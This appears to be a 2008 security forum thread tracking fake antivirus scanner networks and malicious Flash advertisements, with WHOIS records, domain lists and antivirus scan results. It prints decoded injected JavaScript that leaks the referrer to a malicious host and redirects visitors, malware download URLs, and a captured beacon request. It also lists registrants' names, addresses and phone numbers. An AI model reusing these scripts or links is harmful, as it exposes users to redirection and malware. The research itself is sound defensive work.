FoundDate: Tue, 29 Jul 2008 16:12:16 GMT
Server: Apache/1.3.39 (Unix) PHP/5.2.5
Location: http://scanning-computer-online.com/1/?xx=1&in=2&ag=2&end=1&g=1&affid=401&lid=103
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html;

charset=iso-8859-1163<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<HTML><HEAD>
<TITLE>302 Found</TITLE>
</HEAD><BODY>
<H1>Found</H1>
The document has moved <A HREF="http://scanning-computer-online.com/1/?xx=1&in=2&ag=2&end=1&g=1&affid=401&lid=103">here</A>.<P>
<HR>
<ADDRESS>Apache/1.3.39 Server at aqtravel.info Port 80</ADDRESS>
</BODY></HTML>

______________________________

chocolatgirl.50webs.com/description/lame-enc.html

The page contains an obfuscated javascript.

Once decoded we obtain a link to lineacount.info/cgi-bin/counter?id=133722&ref=

CODE
document.write('<sc'+'ript src="http://lineacount.info/cgi-bin/counter?id=133722&ref='+escape(document.referrer)+'"></sc'+'ript>')

At lineacount.info we again fall on an obfuscated script.

Decoded it leads to scan.wsp2008scanner.com/263/509/

CODE
document.write('<sc'+'ript> document.location="http://scan.wsp2008scanner.com/263/509/" </sc'+'ript>');

______________________________

gogele.com

gogele.com redirects to landing.trafficz.com/index.php?domain=gogele.com where we get an advertising popup upon entering the website. If you are unlucky, you will get redirected to some fake online scanner. Some examples are described here.
______________________________

bull.s11.x-beat.com/src/bull124569.gif

I'm redirected to an adult website at the time of the write-up. Exploits are possible on such websites.

aqtravel.info - 88.214.200.55

Website Title: None given.
Created: 2007-06-25
Expires: 2009-06-25
Updated: 2008-06-26
Whois Server: whois.afilias.info
IP Location - United Kingdom - Real International Business Corp

Domain ID:D18657023-LRMS
Domain Name:AQTRAVEL.INFO
Created On:25-Jun-2007 19:57:38 UTC
Last Updated On:26-Jun-2008 10:26:02 UTC
Expiration Date:25-Jun-2009 19:57:38 UTC
Sponsoring Registrar:EstDomains, Inc. (R295-LRMS)
Status:OK
Registrant ID:DI_6401114
Registrant Name:eric peeters
Registrant Organization:N/A
Registrant Street1:stationstraat 87
Registrant Street2:
Registrant Street3:
Registrant City:gent
Registrant State/Province:Oost-Vlaanderen(nl)
Registrant Postal Code:9030
Registrant Country:BE
Registrant Phone:+32.0484659841
Registrant Phone Ext.:
Registrant FAX:
Registrant FAX Ext.:
Registrant Email:
Admin ID:DI_6401114
Admin Name:eric peeters
Admin Organization:N/A
Admin Street1:stationstraat 87
Admin Street2:
Admin Street3:
Admin City:gent
Admin State/Province:Oost-Vlaanderen(nl)
Admin Postal Code:9030
Admin Country:BE
Admin Phone:+32.0484659841
Admin Phone Ext.:
Admin FAX:
Admin FAX Ext.:
Admin Email:
Billing ID:DI_6401114
Billing Name:eric peeters
Billing Organization:N/A
Billing Street1:stationstraat 87
Billing Street2:
Billing Street3:
Billing City:gent
Billing State/Province:Oost-Vlaanderen(nl)
Billing Postal Code:9030
Billing Country:BE
Billing Phone:+32.0484659841
Billing Phone Ext.:
Billing FAX:
Billing FAX Ext.:
Billing Email:
Tech ID:DI_6401114
Tech Name:eric peeters
Tech Organization:N/A
Tech Street1:stationstraat 87
Tech Street2:
Tech Street3:
Tech City:gent
Tech State/Province:Oost-Vlaanderen(nl)
Tech Postal Code:9030
Tech Country:BE
Tech Phone:+32.0484659841
Tech Phone Ext.:
Tech FAX:
Tech FAX Ext.:
Tech Email:
Name Server:NS0.HQHOST.NET
Name Server:NS1.HQHOST.NET

Websites.

Amateur-porn-links.com
Aqtravel.info
Atona.org
Bannergs.info
Bez-piva.net
Boob-porn.net
Boobgayporn.net
Changefuture.net
Cheryclub.com
Cheryclub.org
Digimon-hentai.org
Easyrial.com
Funsjoy.org
Gainrich.net
Geotem.info
Gigonly.info
Givedata.com
Google-defloration.com
Gps-sat-position.com
Helpmothers.net
Hlth-care.com
Hostel-young.com
Intop20.net
Isellbody.com
Korkas.org
Ku4a.com
Kupola-ua.com
Lesbian-adult.net
Lesbiangayadult.net
Lyudmila.net
Mainsearch.biz
Millioncent.com
Myliras.org
Naqtravel.com
Nude-adult.net
Nudegayadult.net
Oblojka.biz
Okolonet.com
Paris-young.com
Pornjokers.com
Rington-city.com
Russtandart.com
Saveage.info
Search-insurance.com
Seopetersburg.com
Skrepka.org
Softseo.net
Start-porn.net
Startgayporn.net
Tablets-city.com
Teens-master.com
Telescope-off.com
Tits-adult.net
Titsgayadult.net
Tooeasycash.com
Webikweb.info
Xfaktorz.org
Xxx-nude.net
Xxxgaynude.net
Yourrial.com

scanning-computer-online.com - 91.203.92.48

Website Title: None given.
ICANN Registrar: DIRECTI INTERNET SOLUTIONS PVT. LTD. D/B/A PUBLICDOMAINREGISTRY.COM
Created: 2008-07-04
Expires: 2009-07-04
Updated: 2008-07-04
Name Server: NS1.MYNICK.NAME (has 931 domains)
Name Server: NS2.MYNICK.NAME
Name Server: NS3.MYNICK.NAME
Name Server: NS4.MYNICK.NAME
Whois Server: whois.publicdomainregistry.com
IP Location - United Kingdom - Isp Uatelecom Llc

Domain Name: SCANNING-COMPUTER-ONLINE.COM

Creation Date: 04-Jul-2008
Expiration Date: 04-Jul-2009

Domain servers in listed order:
ns4.mynick.name
ns3.mynick.name
ns2.mynick.name
ns1.mynick.name

Registrant:
TORS BUISINESS LIMITED
Andreas Ellinas ()
Suite 2, Portland House, Glacis Road,
Gibraltar
Not Applicable,220174
GI
Tel. +375.296324764

Administrative Contact:
TORS BUISINESS LIMITED
Andreas Ellinas ()
Suite 2, Portland House, Glacis Road,
Gibraltar
Not Applicable,220174
GI
Tel. +375.296324764

Technical Contact:
TORS BUISINESS LIMITED
Andreas Ellinas ()
Suite 2, Portland House, Glacis Road,
Gibraltar
Not Applicable,220174
GI
Tel. +375.296324764

Billing Contact:
TORS BUISINESS LIMITED
Andreas Ellinas ()
Suite 2, Portland House, Glacis Road,
Gibraltar
Not Applicable,220174
GI
Tel. +375.296324764

Websites.

Antivirus-pc-scanner.com
Buy-secure-protection.com
Fast-pc-scanner-online.com
Full-protection-now.com
Get-full-protection.com
Get-protected-now.com
Make-pc-secure-now.com
Online-pc-scanner.com
Online-scanning-computer.com
Pc-antivirus-scanner.com
Pc-scanner-online.com
Scanning-computer-online.com
Secure-pc-protection.com
Top-pc-scanner.com

lineacount.info - 85.255.118.122

Website Title: None given.
Created: 2007-05-03
Expires: 2009-05-03
Updated: 2008-06-19
Whois Server: whois.afilias.info

Server Type: Apache/1.3.31 (Unix) mod_python/2.7.10 Python/2.2.2 mod_webapp/1.2.0-dev mod_perl/1.29 mod_throttle/3.1.2 PHP/4.3.8 FrontPage/5.0.2.2510 mod_ssl/2.8.18 OpenSSL/0.9.7d
IP Location - Ukraine - Ukrtelegroup Ltd

Domain ID:D17629058-LRMS
Domain Name:LINEACOUNT.INFO
Created On:03-May-2007 11:59:52 UTC
Last Updated On:19-Jun-2008 14:04:36 UTC
Expiration Date:03-May-2009 11:59:52 UTC
Sponsoring Registrar:EstDomains, Inc. (R295-LRMS)
Status:OK
Registrant ID:DI_6310930
Registrant Name:Byron Hadley
Registrant Organization:N/A
Registrant Street1:Hornindal
Registrant Street2:
Registrant Street3:
Registrant City:Hornindal
Registrant State/Province:Not Applicable
Registrant Postal Code:6763
Registrant Country:NO
Registrant Phone:+47.57879605
Registrant Phone Ext.:
Registrant FAX:
Registrant FAX Ext.:
Registrant Email:
Admin ID:DI_6310930
Admin Name:Byron Hadley
Admin Organization:N/A
Admin Street1:Hornindal
Admin Street2:
Admin Street3:
Admin City:Hornindal
Admin State/Province:Not Applicable
Admin Postal Code:6763
Admin Country:NO
Admin Phone:+47.57879605
Admin Phone Ext.:
Admin FAX:
Admin FAX Ext.:
Admin Email:
Billing ID:DI_6310930
Billing Name:Byron Hadley
Billing Organization:N/A
Billing Street1:Hornindal
Billing Street2:
Billing Street3:
Billing City:Hornindal
Billing State/Province:Not Applicable
Billing Postal Code:6763
Billing Country:NO
Billing Phone:+47.57879605
Billing Phone Ext.:
Billing FAX:
Billing FAX Ext.:
Billing Email:
Tech ID:DI_6310930
Tech Name:Byron Hadley
Tech Organization:N/A
Tech Street1:Hornindal
Tech Street2:
Tech Street3:
Tech City:Hornindal
Tech State/Province:Not Applicable
Tech Postal Code:6763
Tech Country:NO
Tech Phone:+47.57879605
Tech Phone Ext.:
Tech FAX:
Tech FAX Ext.:
Tech Email:
Name Server:NS1.LINEACOUNT.INFO
Name Server:NS2.LINEACOUNT.INFO

Websites.

30g60.info
4martina.info
5mercant.info
Adikmoz.info
Adoremio.info
Ail-mati.info
Alupeso.info
Arbu4i.info
Asterkop.info
Atipero.info
Bonsita.info
Boureus.info
Buffbarr.info
Chestnut8.info
Chibasa.info
Chineseb.info
Chobitsu.info
Clopdi.info
Collared.info
Commonst.info
Counterpoints.info
Creazapa.info
Crendol.info
Dolosyto.info
Doormoi.info
Epagina-89.info
Essquell.info
Estewess.info
Fer2go.info
Gaibanet.info
Garcita.info
Gebvalle.info
Genuero.info
Gigantiko.info
Glecerisca.info
Grecesco.info
Grengo.info
Hulista.info
Iledetu.info
Jamento.info
Jason-b8.info
Jelitaro.info
Juncite.com
Keichita.info
Kitankon.info
Klaudiu5.info
Kodonomo.info
Kooletsrc.info
Krezetta.info
Lamini9.info
Laritanh.info
Lativardo.info
Lavilo.info
Leposit.info
Lineacount.info
Livila.info
Lolat.info
Lopitarsite.info
Maderalti.info
Madorut.info
Makotyan.info
Mambito.info
Man4ito.info
Manovar13.info
Matiusfor.info
Mentarka.info
Miaredo.info
Miracloof.info
Moburic.info
Montazo.info
Moruandre.info
Oledeto.info
Palerdoz.info
Pricalca.info
Qutipart.info
Regackt.info
Renmeik.info
Saimour-man.info
Sentaf.info
Serinity.info
Snaceslot.info
Solsilke.info
Termig1.info
Trust-pag.info
Unmarine.info
Uresagi.info
Weranda.info
Werterta.info
Windolin.info
Wvvw-pagine.info
Zoisait.info

scan.wsp2008scanner.com - 85.255.119.146

Website Title: None given.
ICANN Registrar: ESTDOMAINS, INC.
Created: 2008-07-23
Expires: 2009-07-23
Updated: 2008-07-23
Name Server: NS1.EVERYDNS.NET (has 93,672 domains)
Name Server: NS2.EVERYDNS.NET
Name Server: NS3.EVERYDNS.NET
Name Server: NS4.EVERYDNS.NET
Whois Server: whois.estdomains.com

Registration Service Provided By: ESTDOMAINS INC
Contact: +1.3027224217
Website: .www.estdomains.com

Domain Name: WSP2008SCANNER.COM

Registrant:
Gorelik
Nicole Renaissance ()
General Conti str.
New York
New York,77102
US
Tel. +001.3328439284
Fax. +001.3328439284

Creation Date: 23-Jul-2008
Expiration Date: 23-Jul-2009

Domain servers in listed order:
ns4.everydns.net
ns3.everydns.net
ns2.everydns.net
ns1.everydns.net

Administrative Contact:
Gorelik
Nicole Renaissance ()
General Conti str.
New York
New York,77102
US
Tel. +001.3328439284
Fax. +001.3328439284

Technical Contact:
Gorelik
Nicole Renaissance ()
General Conti str.
New York
New York,77102
US
Tel. +001.3328439284
Fax. +001.3328439284

Billing Contact:
Gorelik
Nicole Renaissance ()
General Conti str.
New York
New York,77102
US
Tel. +001.3328439284
Fax. +001.3328439284

Kimberly

Aug 2 2008, 06:59 PM

c-net 91.208.0

Couple of newcomers in the Still Trade Ltd block. See softtraf.com

91.208.0.233

*.power-antivirus-2009.com CNAME
mail.power-antivirus-2009.com A
ns1.power-antivirus-2009.com A
ns2.power-antivirus-2009.com A
power-antivirus-2009.com A
scanner.power-antivirus-2009.com CNAME

91.208.0.234

*.win-antivir-2008.com CNAME
mail.win-antivir-2008.com A
ns1.win-antivir-2008.com A
ns2.win-antivir-2008.com A
win-antivir-2008.com A

91.208.0.236

*.vit-x-scanner.com CNAME
mail.vit-x-scanner.com A
ns1.vit-x-scanner.com A
ns2.vit-x-scanner.com A
vit-x-scanner.com A
www.vit-x-scanner.com CNAME

91.208.0.238

*.spywatchepromo.com CNAME
ns1.spywatchepromo.com A
spywatchepromo.com A

91.208.0.240

*.anvimaster.com CNAME
anvimaster.com A
mail.anvimaster.com A
ns1.anvimaster.com A
scanner.anvimaster.com CNAME

91.208.0.241

*.privacy-watcher.com CNAME
ns1.privacy-watcher.com A
ns1.winsafer.com A
privacy-watcher.com A
scanner.privacy-watcher.com CNAME
winsafer.com A

91.208.0.243

*.malwscan.com CNAME
*.shredder-scan.com CNAME
malwscan.com A
ns1.malwscan.com A
ns1.shredder-scan.com A
shredder-scan.com A

91.208.0.244

*.softtraf.com CNAME
*.softtrafik.com CNAME
mail.softtraf.com A
mail.softtrafik.com A
ns1.softtraf.com A
ns1.softtrafik.com A
softtraf.com A
softtrafik.com A

91.208.0.246

*.vav-scan.com CNAME
*.vav-x-scanner.com CNAME
*.vavscan.com CNAME
mail.vav-scan.com A
mail.vav-x-scanner.com A
mail.vavscan.com A
ns1.vav-scan.com A
ns1.vav-x-scanner.com A
ns1.vavscan.com A
ns2.vav-scan.com A
ns2.vav-x-scanner.com A
ns2.vavscan.com A
scanner.vav-scan.com CNAME
scanner.vav-x-scanner.com CNAME
vav-scan.com A
vav-x-scanner.com A
vavscan.com A
www.vav-scan.com CNAME

91.208.0.250

ns2.winxprotector.com A

91.208.0.252

*.anvi-scanner.com CNAME
anvi-scanner.com A
mail.anvi-scanner.com A
ns1.anvi-scanner.com A
ns2.anvi-scanner.com A
scanner.anvi-scanner.com CNAME

91.208.0.253

*.win-antivirus-2008.com CNAME
mail.win-antivirus-2008.com A
ns1.win-antivirus-2008.com A
ns2.win-antivirus-2008.com A
win-antivirus-2008.com

Myspace - antispywaremaster.com

Myspace.com is hit again by a malicious Flash banner. More info at FaceTime Security Labs.

The victims are redirected to antispywaremaster.com as seen on the screenshot. Antispywaremaster.com has been mentioned on several occasions by me & Sandi. Not long ago we say a banner redirecting to them on screensavers.com. ForceUp behind it again? Sandi did mention them a couple of days ago on her blog.

Kimberly

Aug 4 2008, 03:18 AM

91.208.0.233 - 91.208.0.254

Couple more from that same block.

91.208.0.235

Free-host4u.com

91.208.0.237

First-reason.com

91.208.0.239

Winxsecuritycenter.com

91.208.0.242

Blog-antivirus.com
Spyware-blog.com

91.208.0.245

Malware-scan.com
Xmalware-scan.com

91.208.0.247

Softsellout.com
Webspyshield.com

91.208.0.248

Malware-scanner.com
Shredder-scanner.com

91.208.0.249

Defender-scan.com
Watcher-scan.com

91.208.0.251

Win-x-defender.com
Win-x-defenders.com

91.208.0.254

Vistaguard.com

Kimberly

Aug 4 2008, 04:01 AM

global-advers.com

adtds.trackads.net / adtds2.promoplexer.com have activated a new domain: global-advers.com

global-advers.com/soft.php?aid=0639&d=3&product=XPA

Depending on the parameters people will get redirected to different fake online scanners. I got redirected to

windows-scannernv.com/2008/3/freescan.php?aid=880639

global-advers.com - 89.149.226.24

Website Title: None given.
ICANN Registrar: DIRECTI INTERNET SOLUTIONS PVT. LTD. D/B/A PUBLICDOMAINREGISTRY.COM
Created: 2008-07-30
Expires: 2009-07-30
Updated: 2008-07-30
Registrar Status: clientTransferProhibited
Name Server: NS1.MYNICK.NAME (has 897 domains)
Name Server: NS2.MYNICK.NAME
Name Server: NS3.MYNICK.NAME
Name Server: NS4.MYNICK.NAME
Whois Server: whois.publicdomainregistry.com

IP Location - Berlin - Berlin - Netdirekt E.k

Whois Record
Domain Name: GLOBAL-ADVERS.COM

Creation Date: 30-Jul-2008
Expiration Date: 30-Jul-2009

Domain servers in listed order:
ns4.mynick.name
ns3.mynick.name
ns2.mynick.name
ns1.mynick.name

Registrant:
PrivacyProtect.org
Domain Admin ()
P.O. Box 97
Note - All Postal Mails Rejected, visit Privacyprotect.org
Moergestel
null,5066 ZH
NL
Tel. +45.36946676
______________________________

windows-scannernv.com - 89.149.226.24

Website Title: None given.
ICANN Registrar: DIRECTI INTERNET SOLUTIONS PVT. LTD. D/B/A PUBLICDOMAINREGISTRY.COM
Created: 2008-07-22
Expires: 2009-07-22
Updated: 2008-07-22
Registrar Status: clientTransferProhibited
Name Server: NS1.MYNICK.NAME (has 897 domains)
Name Server: NS2.MYNICK.NAME
Name Server: NS3.MYNICK.NAME
Name Server: NS4.MYNICK.NAME
Whois Server: whois.publicdomainregistry.com

IP Location - Berlin - Berlin - Netdirekt E.k

Whois Record
Domain Name: WINDOWS-SCANNERNV.COM

Creation Date: 22-Jul-2008
Expiration Date: 22-Jul-2009

Domain servers in listed order:
ns4.mynick.name
ns3.mynick.name
ns2.mynick.name
ns1.mynick.name

Registrant:
PrivacyProtect.org
Domain Admin ()
P.O. Box 97
Note - All Postal Mails Rejected, visit Privacyprotect.org
Moergestel
null,5066 ZH
NL
Tel. +45.36946676

Other Websites.

antivirus-2009pro.com A
antivirus-database.com A
antivirus2009professional.com A
securityscannersite.com A
spywareonlinescanner.com A
vps014.vserver4free.de PTR A
windows-internet-scanner.com A
windows-scannernv.com A
www.antivirus2009professional.com CNAME

Kimberly

Aug 7 2008, 06:06 AM

Exploiting redirects in Flash content

*Sigh* .... another of those sneaky little Flash files - 1,394 bytes -. This time an executable is downloaded on the PC from www.plgou.com.

Don't visit the site, there are different exploits present and you could encounter them on any website as they are used in sql injections. Apparently a user has been hit on my.yahoo according to Sandi's blog. A Google search on "jjmaobuduo.3322.org/csrss/w.js" reveals already a high number of affected websites.
______________________________

Filename: i47.swf

File size: 1394 bytes
MD5...: b3a302976d5d76a6d28e210b22e535a6
SHA1..: 969935f8367fd738df12b10457897499af4a4b2a
SHA256: f06ff8eb3f3243a3ae0697c3943c8af82ccbbd1381a0c9aef2fdce615ac40b0d
PEiD..: -
packers (Kaspersky): Swf2Swc

QUOTE
File i47.swf received on 08.07.2008 07:45:31
AhnLab-V3 2008.8.7.0 2008.08.07 Win-Trojan/Exploit-SWF.Gen
AntiVir 7.8.1.19 2008.08.06 EXP/Flash.Gen
Authentium 5.1.0.4 2008.08.07 -
Avast 4.8.1195.0 2008.08.06 SWF:CVE-2007-0071
AVG 8.0.0.156 2008.08.06 -
BitDefender 7.2 2008.08.07 Exploit.SWF.Gen
CAT-QuickHeal 9.50 2008.08.06 SWF.Exploit
ClamAV 0.93.1 2008.08.07 -
DrWeb 4.44.0.09170 2008.08.07 -
eSafe 7.0.17.0 2008.08.06 -
eTrust-Vet 31.6.6016 2008.08.06 -
Ewido 4.0 2008.08.06 -
F-Prot 4.4.4.56 2008.08.06 -
F-Secure 7.60.13501.0 2008.08.07 -
Fortinet 3.14.0.0 2008.08.07 -
GData 2.0.7306.1023 2008.08.07 SWF:CVE-2007-0071
Ikarus T3.1.1.34.0 2008.08.07 -
K7AntiVirus 7.10.405 2008.08.06 -
Kaspersky 7.0.0.125 2008.08.07 -
McAfee 5355 2008.08.06 -
Microsoft 1.3807 2008.08.07 Exploit:Win32/APSB08-11.gen!A
NOD32v2 3335 2008.08.07 -
Norman 5.80.02 2008.08.06 -
Panda 9.0.0.4 2008.08.06 -
PCTools 4.4.2.0 2008.08.06 -
Prevx1 V2 2008.08.07 -
Rising 20.56.30.00 2008.08.07 -
Sophos 4.31.0 2008.08.07 Exp/SWFScene-A
Sunbelt 3.1.1537.1 2008.08.07 -
Symantec 10 2008.08.07 -
TheHacker 6.2.96.393 2008.08.04 -
TrendMicro 8.700.0.1004 2008.08.07 -
VBA32 3.12.8.2 2008.08.06 -
ViRobot 2008.8.6.1326 2008.08.06 -
VirusBuster 4.5.11.0 2008.08.06 -
Webwasher-Gateway 6.6.2 2008.08.06 Exploit.Flash.Gen

______________________________

rondll32.exe

File size: 29244 bytes
MD5...: 68ba2b52c10841ea3d3e5d0982f647d8
SHA1..: 1fadf7e63621f5c60246759a0392203451ec6fd7
SHA256: 4315e62ec430fcc7820b95dcbdd780f210e1b55f188d56281c309d08208dc702
PEiD..: -

QUOTE
File rondll32.exe received on 08.07.2008 07:46:26
AhnLab-V3 2008.8.7.0 2008.08.07 -
AntiVir 7.8.1.19 2008.08.06 TR/Dropper.Gen
Authentium 5.1.0.4 2008.08.07 W32/Heuristic-210!Eldorado
Avast 4.8.1195.0 2008.08.06 -
AVG 8.0.0.156 2008.08.06 SHeur.CAWE
BitDefender 7.2 2008.08.07 -
CAT-QuickHeal 9.50 2008.08.06 (Suspicious) - DNAScan
ClamAV 0.93.1 2008.08.07 PUA.Packed.UPack-2
DrWeb 4.44.0.09170 2008.08.07 MULDROP.Trojan
eSafe 7.0.17.0 2008.08.06 Suspicious File
eTrust-Vet 31.6.6016 2008.08.06 -
Ewido 4.0 2008.08.06 -
F-Prot 4.4.4.56 2008.08.06 W32/Heuristic-210!Eldorado
F-Secure 7.60.13501.0 2008.08.07 W32/Suspicious_U.gen
Fortinet 3.14.0.0 2008.08.07 -
GData 2.0.7306.1023 2008.08.07 Backdoor.Win32.Small.flb
Ikarus T3.1.1.34.0 2008.08.07 Trojan-Dropper
K7AntiVirus 7.10.405 2008.08.06 -
Kaspersky 7.0.0.125 2008.08.07 Backdoor.Win32.Small.flb
McAfee 5355 2008.08.06 New Malware.aj
Microsoft 1.3807 2008.08.07 -
NOD32v2 3335 2008.08.07 -
Norman 5.80.02 2008.08.06 W32/Suspicious_U.gen
Panda 9.0.0.4 2008.08.06 Suspicious file
PCTools 4.4.2.0 2008.08.06 Packed/Upack
Prevx1 V2 2008.08.07 Malicious Software
Rising 20.56.30.00 2008.08.07 -
Sophos 4.31.0 2008.08.07 Mal/Packer
Sunbelt 3.1.1537.1 2008.08.07 VIPRE.Suspicious
Symantec 10 2008.08.07 Trojan Horse
TheHacker 6.2.96.393 2008.08.04 W32/Behav-Heuristic-060
TrendMicro 8.700.0.1004 2008.08.07 PAK_Generic.006
VBA32 3.12.8.2 2008.08.06 -
ViRobot 2008.8.6.1326 2008.08.06 -
VirusBuster 4.5.11.0 2008.08.06 Packed/Upack
Webwasher-Gateway 6.6.2 2008.08.06 Trojan.Dropper.Gen

ThreatExpert Report.
______________________________

plgou.com - 121.11.76.85

Domain Name: PLGOU.COM
Registrar: ENAME, INC
Whois Server: whois.ename.com
Referral URL: http://www.ename.com
Name Server: NS1.ENAME.CN
Name Server: NS2.ENAME.CN
Name Server: NS3.ENAME.CN
Name Server: NS4.ENAME.CN
Name Server: NS5.ENAME.CN
Name Server: NS6.ENAME.CN
Status: clientDeleteProhibited
Status: clientTransferProhibited
Updated Date: 10-mar-2008
Creation Date: 17-feb-2008
Expiration Date: 17-feb-2009

Kimberly

Aug 7 2008, 11:11 PM

Nancy Drew - Circulating malvertisement

Nancy Drew Solves Mysteries In Style ... whoops ... maybe we should say Nancy Drew Hijacks In Style instead. And this time no redirect to a fake online scanner but an executable. The pest is nifty to remove btw as it belongs to the Vundo family.

Banner.

Redirect.

82.98.235.173/ex3/i.exe

______________________________

Filename: i.exe

File size: 34816 bytes
MD5...: 01511e9da4f526b2b44f772c62b2bedd
SHA1..: 6686169f7240c81bdbe888b3136771317907b657
SHA256: ee374db6872205044a8a8cb518d881b6d9553d10e333329cf8cb709291008102
PEiD..: -

QUOTE
File i.exe received on 08.08.2008 00:43:41
AhnLab-V3 2008.8.8.0 2008.08.07 -
AntiVir 7.8.1.19 2008.08.07 -
Authentium 5.1.0.4 2008.08.07 -
Avast 4.8.1195.0 2008.08.07 Win32:Trojan-gen {Other}
AVG 8.0.0.156 2008.08.07 SHeur.BZCG
BitDefender 7.2 2008.08.07 -
CAT-QuickHeal 9.50 2008.08.07 (Suspicious) - DNAScan
ClamAV 0.93.1 2008.08.07 -
DrWeb 4.44.0.09170 2008.08.07 -
eSafe 7.0.17.0 2008.08.07 Suspicious File
eTrust-Vet 31.6.6018 2008.08.07 -
Ewido 4.0 2008.08.07 -
F-Prot 4.4.4.56 2008.08.07 -
F-Secure 7.60.13501.0 2008.08.07 -
Fortinet 3.14.0.0 2008.08.07 -
GData 2.0.7306.1023 2008.08.07 Win32:Trojan-gen
Ikarus T3.1.1.34.0 2008.08.07 Virus.Win32.Trojan
K7AntiVirus 7.10.407 2008.08.07 -
Kaspersky 7.0.0.125 2008.08.08 -
McAfee 5356 2008.08.07 -
Microsoft 1.3807 2008.08.08 -
NOD32v2 3338 2008.08.07 -
Norman 5.80.02 2008.08.06 -
Panda 9.0.0.4 2008.08.07 -
PCTools 4.4.2.0 2008.08.07 -
Prevx1 V2 2008.08.08 Malicious Software
Rising 20.56.32.00 2008.08.07 Packer.Win32.Mian007.a
Sophos 4.32.0 2008.08.07 -
Sunbelt 3.1.1537.1 2008.08.07 -
Symantec 10 2008.08.08 -
TheHacker 6.2.96.394 2008.08.08 -
TrendMicro 8.700.0.1004 2008.08.07 -
VBA32 3.12.8.3 2008.08.07 -
ViRobot 2008.8.7.1328 2008.08.07 -
VirusBuster 4.5.11.0 2008.08.07 -
Webwasher-Gateway 6.6.2 2008.08.07 Win32.Malware.gen!90 (suspicious)

ThreatExpert Report.

Addendum to the ThreatExpert report.

Visible Signs.

O4 - HKCU\..\Run: [A00F25D34.exe] C:\DOCUME~1\KLY\LOCALS~1\Temp\_A00F25D34.exe
O20 - Winlogon Notify: __c005C86E - C:\WINDOWS\system32\__c005C86E.dat

When Internet Explorer is opened, __c005C86E.dat tries to download additional stuff from nx1.todaystats.com using a special User Agent but as seen in the network capture, we get a 404 error for the time being.

CODE
GET /?a=4011&t=[removed]/[removed]=&f=0 HTTP/1.1
User-Agent: MSIE
Host: nx1.todaystats.com
Cache-Control: no-cache

HTTP/1.1 404 Not Found
Server: Apache-Coyote/1.1
Date: Fri, 08 Aug 2008 04:03:59 GMT
Connection: close

______________________________

82.98.235.173

Whois Record
inetnum: 82.98.235.0 - 82.98.235.255
netname: CYBERTECHNOLOGY
descr: Cyber Technology BV BA/SPRL
descr: Belgium
country: NL
admin-c: OVL3-RIPE
tech-c: OVL3-RIPE
status: ASSIGNED PA
remarks: *******************************************
remarks: * Abuse contact: *
remarks: *******************************************
mnt-by: ABOVENET-P
mnt-lower: ABOVENET-P
mnt-routes: ABOVENET-P
source: RIPE # Filtered

person: Oliver van Loven
address: Cyber Technology BVBA/SPRL
address: 164 rue emile dury
address: 1410 Waterloo Brussels
address: Belgium
e-mail:
phone: +32 2 479 87 16
fax-no: +32 2 479 87 16
mnt-by: ABOVENET-P
nic-hdl: OVL3-RIPE
source: RIPE # Filtered
______________________________

nx1.todaystats.com - 82.98.193.167 & 82.98.193.18
todaystats.com - 62.4.84.4

Kimberly

Aug 8 2008, 03:46 AM

New malvertizement for E*Trade Financial

Courtesy of Sandi.

E*Trade Financial (etrade.com).

Campaign.

stathome.net/c/index.php?id=[removed]
profitabill.com/?cmpid=responsein&adid=intl

More info.

Kimberly

Aug 8 2008, 06:23 AM

123greetings.com - BigHip

A new malvertizement is being served on 123greetings.com featuring BigHip Email Marketing Solutions. Fuse Kit 2.1.4. was used for this creative.

Screenshot in situ.

Banner.

imagec05.247realmedia.com/RealMedia/ads/Creatives/123Greet/Servedad_LB_11137A/big_hip_01_728x90.swf

Campaign.

openadstream.net/stat.gif?url=[removed]

At the time of the write-up the full redirect was inactive. Adopstools was not able to analyse the malicious banner.

Kimberly

Aug 9 2008, 12:29 AM

Warning: forbes.com - BigHip

The BigHip malvertizement discovered less than 24h ago on 123greetings.com *might* eventually be displayed at forbes.com, everything does of course depend on how long some advertisements are being actively used. The malicious banner is present on their server as seen below.

Screenshot.

Banner.

images.forbes.com/ads/BigHip/New.swf

Campaign.

openadstream.net/stat.gif?url=[removed]

The redirect is identical as the one from 123greetings.com. At the time of the write-up the full redirect was inactive.

Flash banner properties.

Using wget, the flash file has a date stamp from July 11 2008. Until further notice I would recommend extreme caution upon visiting forbes.com

Network Trace.

CODE
GET http://openadstream.net/stat.gif?url=[removed] HTTP/1.1
Accept: */*
Referer: http://images.forbes.com/ads/BigHip/New.swf
x-flash-version: 9,0,47,0
Accept-Encoding: gzip, deflate
User-Agent: Mozilla

______________________________

On a lighter note, the advertising campaign on 123greetings.com has been suspended earlier today. Ref.

Kimberly

Aug 9 2008, 03:30 PM

Served Ad - www.servedad.net

A while back we saw that folder names in URL's can reveal interesting things, cf ReachWe. When I looked at the URL leading to the BigHip advertisement, I knew I already saw Servedad somewhere ...

BigHip.

imagec05.247realmedia.com/RealMedia/ads/Creatives/123Greet/Servedad_LB_11137A/big_hip_01_728x90.swf

Link.

Forex